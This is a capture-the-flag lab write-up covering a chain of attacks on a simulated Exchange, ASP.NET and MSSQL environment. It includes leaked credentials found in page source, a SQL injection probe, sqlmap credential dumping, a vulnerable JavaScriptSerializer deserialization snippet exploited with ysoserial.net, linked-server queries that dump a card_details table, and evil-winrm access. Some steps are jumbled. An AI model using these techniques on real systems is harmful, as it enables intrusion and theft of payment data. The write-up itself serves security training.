Since there's not that much of stuff to cover I started with getting a deeper look on the Webpage itself.
The usual stuff like going through every site and checking the page source for example.
Flag
The flag was hidden under /Home/Staff. As soon as you check the page source you will find the flag and credentials for a user.
<!-- TODO: Set up Abbie on the portal, she'll be taking over my duties while I'm away.Karl if I forget to do this, it's jay.teignton:admin for the portalCONTEXT{CENSORED}-->
That shouldn't be there...
Enumeration
Using the credentials found earlier we are able to login as administrator for the webpage.
First thing discovered was the new management tab where I'm able to add new products or remove current products.
This screamed SQL Injection in my face and after testing around I could confirm that we indeed have a SQL Injection here.
Can be verified by putting this into the name or certified field
'+(SELECT user_name())+'
Exploitation
Used SQLmap and a captured request from burp to dumo credentials from the database.
The flag is found under user id 3 in database table users
Have we met before?
Enumeration
I tried to use abbie.buckfast credentials to login to /ecp which unfortunately didn't work as abbie isn't an exchange admin.
A login to /owa worked.
There was nothing much to check but the option to "open another mailbox" seemed interesting.
Exploitation
I checked the "People" tab to identify any users that exist and have a mailbox.
In the end I was able to open jay.teningtons mailbox. Whic hwas obvious as stated in the comment for "But we have SSL!?" it states that abbie will take over his duties.
Flag
The flag can be found within jays account mailbox in the Sent Items folder.
Is it a bird? Is it a plane?
Enumeration
After getting hold of jays OWA mailbox I was able to view a mail which had the webapp attached to it.
Since there's nothing else to find I will analyze the source.
One thing that I always keep an eye out for is deserialization and this time I was lucky to spot something easily.
_ViewStart.cshtml
@{ Layout ="~/Views/Shared/_Layout.cshtml";}@using System.Text;@using System.Web.Script.Serialization;@{ if (0!=Context.Session.Keys.Count) {if (null !=Context.Request.Cookies.Get("Profile")) { try { byte[] data =Convert.FromBase64String(Context.Request.Cookies.Get("Profile")?.Value); string str =UTF8Encoding.UTF8.GetString(data); SimpleTypeResolver resolver = new SimpleTypeResolver(); JavaScriptSerializer serializer = new JavaScriptSerializer(resolver); object obj = (serializer.Deserialize(str, typeof(object)) as Profile);// TODO: create profile to change the language and font of the website } catch (Exception e) { } } }}
Exploitation
I'm used to do everything on my Linux machine this time I had to switch to Windows for generating my payload.
Used ysoserial.net for it.
-- Will return WEB\CLIENTSselect*frommaster..sysservers
Get DBs
-- Will return clients dbselect*fromopenquery("WEB\CLIENTS", 'select name from master..sysdatabases')
Get Tables and dump content
-- Get tablesselect*fromopenquery("WEB\CLIENTS", 'select * from clients.INFORMATION_SCHEMA.TABLES;')-- Dump content from table card_detailsselect*fromopenquery("WEB\CLIENTS", 'select * from clients..card_details')
That's were the flag was found.
It's not a backdoor, it's a feature
Enumeration
Couldn't find that much on the DB itself so I logged into OWA using karls account to find an E-Mail that says
Hi Andy,
I have added those restrictions on Jay, and added something to the database so I can generate a client list for him. Might be overkill but I don't want him wiping the DB again.
Cheers,
Karl
Now it was time to check the DB again for stuff that could be used as a user
-- Found C:\Users\Administrator\Scripts\clientsbackup.dllselect*fromopenquery("WEB\CLIENTS", 'select * from clients.sys.assembly_files')
Let's get that file onto my client
-- Export content as base64 encoded stringselectcast((select content fromopenquery([web\clients], 'select * from clients.sys.assembly_files') where assembly_id =65536) asvarbinary(max)) forxmlpath(''), binarybase64;go> binary.b64
I used ILSpy to decompile the dll and check the source code.
You'll find a function called BackupClients there, this part holds credentials for the user jay.teignton.
Exploitation
Nothing to "exploit" just use evil-winrm to get access to the system
Locating the flag wasn't as straight forward as I thought. Most of the time it's just a file on Desktop or any other location.
After poking around I started to check a file that seemed suspicious and was called WindowsService.exe and located in the documents folder.
# Will reveal the flagcat .\WindowsService.exe
Key to the castle
Enumeration
whoami /all
# Basically we are an administrator at this pointGroup Name ==========================================BUILTIN\Administrators